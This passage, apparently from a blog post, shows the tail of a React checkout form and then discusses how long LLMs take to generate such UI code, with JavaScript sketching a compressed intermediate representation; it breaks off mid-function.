</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;john.doe@example.com&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          {<span style="color:#75715e">/* Shipping Address */</span>}
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mb-6&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-semibold text-gray-700 mb-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">Shipping</span> <span style="color:#a6e22e">Address</span>
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;address&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Address</span>
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;address&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;address&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">address</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;123 Main St&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 md:grid-cols-2 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;city&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">City</span>
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;city&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;city&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">city</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Anytown&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;zip&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">Zip</span> <span style="color:#a6e22e">Code</span>
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;zip&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;zip&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">zip</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;12345&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          {<span style="color:#75715e">/* Payment Information */</span>}
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-semibold text-gray-700 mb-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">Payment</span> <span style="color:#a6e22e">Information</span>
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-1 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cardNumber&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">Card</span> Number
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cardNumber&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cardNumber&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">cardNumber</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;**** **** **** ****&#34;</span>
</span></span><span style="display:flex;"><span>                /&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;grid grid-cols-2 gap-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;expiryDate&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">Expiry</span> Date
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;expiryDate&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;expiryDate&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">expiryDate</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;MM/YY&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">label</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">htmlFor</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cvv&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;block text-sm font-medium text-gray-600 mb-1&#34;</span>
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">CVV</span>
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">label</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">input</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cvv&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cvv&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">formData</span>.<span style="color:#a6e22e">cvv</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onChange</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleInputChange</span>}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;w-full p-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-blue-500 focus:border-transparent transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;123&#34;</span>
</span></span><span style="display:flex;"><span>                  /&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        {<span style="color:#75715e">/* Shopping Basket Section */</span>}
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex-1 bg-gray-50 p-6 rounded-xl shadow-inner&#34;</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">h3</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-2xl font-extrabold text-gray-800 mb-6 text-center&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">Your</span> <span style="color:#a6e22e">Basket</span>
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">h3</span>&gt;
</span></span><span style="display:flex;"><span>          {<span style="color:#a6e22e">basketItems</span>.<span style="color:#a6e22e">length</span> <span style="color:#f92672">===</span> <span style="color:#ae81ff">0</span> <span style="color:#f92672">?</span> (
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-center text-gray-500&#34;</span>&gt;<span style="color:#a6e22e">Your</span> <span style="color:#a6e22e">basket</span> <span style="color:#a6e22e">is</span> <span style="color:#a6e22e">empty</span>.&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>          ) <span style="color:#f92672">:</span> (
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;space-y-4&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              {<span style="color:#a6e22e">basketItems</span>.<span style="color:#a6e22e">map</span>((<span style="color:#a6e22e">item</span>) =&gt; (
</span></span><span style="display:flex;"><span>                &lt;<span style="color:#f92672">div</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">key</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">id</span>}
</span></span><span style="display:flex;"><span>                  <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex items-center justify-between bg-white p-4 rounded-lg shadow-sm border border-gray-200&#34;</span>
</span></span><span style="display:flex;"><span>                &gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flex-grow&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                    &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;font-semibold text-gray-800&#34;</span>&gt;{<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">name</span>}&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>                    &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-gray-600 text-sm&#34;</span>&gt;
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">$</span>{<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">price</span>.<span style="color:#a6e22e">toFixed</span>(<span style="color:#ae81ff">2</span>)} <span style="color:#a6e22e">x</span> {<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">quantity</span>}
</span></span><span style="display:flex;"><span>                    &lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;<span style="color:#f92672">button</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">onClick</span><span style="color:#f92672">=</span>{() =&gt; <span style="color:#a6e22e">handleDeleteItem</span>(<span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">id</span>)}
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;ml-4 p-2 bg-red-500 text-white rounded-full hover:bg-red-600 focus:outline-none focus:ring-2 focus:ring-red-500 focus:ring-opacity-50 transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>                    <span style="color:#a6e22e">aria</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#a6e22e">label</span><span style="color:#f92672">=</span>{<span style="color:#e6db74">`Delete </span><span style="color:#e6db74">${</span><span style="color:#a6e22e">item</span>.<span style="color:#a6e22e">name</span><span style="color:#e6db74">}</span><span style="color:#e6db74">`</span>}
</span></span><span style="display:flex;"><span>                  &gt;
</span></span><span style="display:flex;"><span>                    &lt;<span style="color:#f92672">svg</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">xmlns</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://www.w3.org/2000/svg&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;h-5 w-5&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">viewBox</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;0 0 20 20&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#a6e22e">fill</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;currentColor&#34;</span>
</span></span><span style="display:flex;"><span>                    &gt;
</span></span><span style="display:flex;"><span>                      &lt;<span style="color:#f92672">path</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">fillRule</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;evenodd&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">d</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;M9 2a1 1 0 00-.894.553L7.382 4H4a1 1 0 000 2v10a2 2 0 002 2h8a2 2 0 002-2V6a1 1 0 100-2h-3.382l-.724-1.447A1 1 0 0011 2H9zM7 8a1 1 0 012 0v6a1 1 0 11-2 0V8zm6 0a1 1 0 012 0v6a1 1 0 11-2 0V8z&#34;</span>
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">clipRule</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;evenodd&#34;</span>
</span></span><span style="display:flex;"><span>                      /&gt;
</span></span><span style="display:flex;"><span>                    &lt;/<span style="color:#f92672">svg</span>&gt;
</span></span><span style="display:flex;"><span>                  &lt;/<span style="color:#f92672">button</span>&gt;
</span></span><span style="display:flex;"><span>                &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>              ))}
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>          )}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mt-8 pt-4 border-t-2 border-gray-200 flex justify-between items-center&#34;</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-bold text-gray-800&#34;</span>&gt;<span style="color:#a6e22e">Total</span><span style="color:#f92672">:</span>&lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>            &lt;<span style="color:#f92672">p</span> <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text-xl font-bold text-blue-600&#34;</span>&gt;
</span></span><span style="display:flex;"><span>              <span style="color:#a6e22e">$</span>{<span style="color:#a6e22e">calculateTotal</span>()}
</span></span><span style="display:flex;"><span>            &lt;/<span style="color:#f92672">p</span>&gt;
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>          &lt;<span style="color:#f92672">button</span>
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">onClick</span><span style="color:#f92672">=</span>{<span style="color:#a6e22e">handleCheckout</span>}
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">className</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;mt-6 w-full py-4 bg-blue-600 text-white text-lg font-semibold rounded-lg shadow-md hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-opacity-50 transition duration-200&#34;</span>
</span></span><span style="display:flex;"><span>          &gt;
</span></span><span style="display:flex;"><span>            <span style="color:#a6e22e">Proceed</span> <span style="color:#a6e22e">to</span> <span style="color:#a6e22e">Checkout</span>
</span></span><span style="display:flex;"><span>          &lt;/<span style="color:#f92672">button</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>      &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>  );
</span></span><span style="display:flex;"><span>};
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">export</span> <span style="color:#66d9ef">default</span> <span style="color:#a6e22e">App</span>;
</span></span></code></pre></div><p><strong>4982 tokens</strong>. At 150 tokens per second just for the response we are looking at 33 seconds to generate the UI, and this is still a relatively simple UI.</p>
<p>Latency accumulates across the full stack, and we&rsquo;re going to need a step change in performance to get to the 0.1 second threshold.</p>
<p>There seem to be multiple approaches to improving this performance and reducing latency. On one hand you have <a href="https://groq.com">Groq</a> making custom hardware, and on the other you have algorithmic changes like <a href="https://deepmind.google/models/gemini-diffusion/">Text Diffusion</a> (showcased at Google I/O 2025), with both appearing to deliver between 1000 and 2000 tokens per second. At those speeds the checkout form above would be generated in roughly 2.5 to 5 seconds.</p>
<p>That&rsquo;s an order of magnitude improvement in generation speed in the space of 2 years, but to get sub-second it looks like we need another order of magnitude improvement, so something in the 10,000 tokens per second range.</p>
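<p>The arithmetic behind these estimates can be sketched in a few lines. This is a back-of-the-envelope model only: it assumes generation time is simply output tokens divided by decode speed, and it ignores network, prompt processing and rendering time. The function names <code>generationSeconds</code> and <code>requiredTokensPerSecond</code> are made up for illustration.</p>

```javascript
// Rough generation-time estimate: output tokens divided by decode speed.
// Assumption: network, prompt processing and rendering time are ignored.
function generationSeconds(tokens, tokensPerSecond) {
  if (!(tokensPerSecond > 0)) {
    throw new RangeError("tokensPerSecond must be positive");
  }
  return tokens / tokensPerSecond;
}

// Decode speed needed to produce `tokens` within `targetSeconds`.
function requiredTokensPerSecond(tokens, targetSeconds) {
  if (!(targetSeconds > 0)) {
    throw new RangeError("targetSeconds must be positive");
  }
  return tokens / targetSeconds;
}

const CHECKOUT_FORM_TOKENS = 4982; // token count quoted for the checkout form

// Decode speeds mentioned in the text, in tokens per second.
const speeds = [150, 1000, 2000, 10000];

for (const tps of speeds) {
  const seconds = generationSeconds(CHECKOUT_FORM_TOKENS, tps);
  console.log(`${tps} tokens/s: ${seconds.toFixed(2)} s`);
}

// Speed needed to hit the 0.1 second threshold for this one form.
const needed = requiredTokensPerSecond(CHECKOUT_FORM_TOKENS, 0.1);
console.log(`0.1 s target: about ${Math.round(needed)} tokens/s`);
```

<p>Under this model the form takes about 33 seconds at 150 tokens per second, roughly 5 seconds at 1,000, about 2.5 seconds at 2,000 and about half a second at 10,000. Hitting 0.1 seconds for the same output would need something close to 50,000 tokens per second, or far fewer tokens.</p>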
<p>To me HTML, CSS and JS feel like the right level of abstraction for generating UI inside LLMs, not least because we can generate them for any platform, Web or Native app. Given the languages&rsquo; relative verbosity, though, it does raise the question of whether an intermediate representation of UI that is more compressed and quicker to generate might be a better approach. For example, I could imagine a constrained set of &ldquo;<a href="https://paul.kinlan.me/custom-elements-ecosystem/">Web Component interfaces</a>&rdquo;. Or maybe we just use smaller &ldquo;lower quality&rdquo; models, or maybe we just wait for another step change to happen in the models and hardware.</p>
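<p>To make the intermediate representation idea a little more concrete, here is a minimal sketch of one possible shape, not a proposal for a real format. It assumes the model emits only a small spec for the shipping address section, and a deterministic renderer on the client expands it into the full element tree. Everything here is hypothetical: the spec fields (<code>title</code>, <code>fields</code>, <code>id</code>, <code>label</code>, <code>placeholder</code>), the <code>el</code> helper that builds plain objects as a stand-in for real DOM or React elements, and the use of character counts as a crude proxy for tokens. The grid wrappers and the <code>value</code>/<code>onChange</code> wiring from the form above are left out to keep it short.</p>

```javascript
// Hypothetical compact spec a model could emit instead of full markup.
const shippingSpec = {
  title: "Shipping Address",
  fields: [
    { id: "address", label: "Address", placeholder: "123 Main St" },
    { id: "city", label: "City", placeholder: "Anytown" },
    { id: "zip", label: "Zip Code", placeholder: "12345" },
  ],
};

// Class names copied from the checkout form above. They live in the
// renderer, so the model never has to generate them.
const LABEL_CLASS = "block text-sm font-medium text-gray-600 mb-1";
const INPUT_CLASS =
  "w-full p-3 border border-gray-300 rounded-lg focus:ring-2 " +
  "focus:ring-blue-500 focus:border-transparent transition duration-200";

// Tiny element factory producing plain objects (a stand-in for a real
// DOM or React element tree).
function el(tag, props, ...children) {
  return { tag, props, children };
}

// Deterministically expand one compact field into label + input elements.
function expandField(field) {
  return el(
    "div",
    {},
    el("label", { htmlFor: field.id, className: LABEL_CLASS }, field.label),
    el("input", {
      type: "text",
      id: field.id,
      name: field.id,
      placeholder: field.placeholder,
      className: INPUT_CLASS,
    })
  );
}

// Expand the whole section: a heading plus one block per field.
function expandSection(spec) {
  return el(
    "div",
    { className: "mb-6" },
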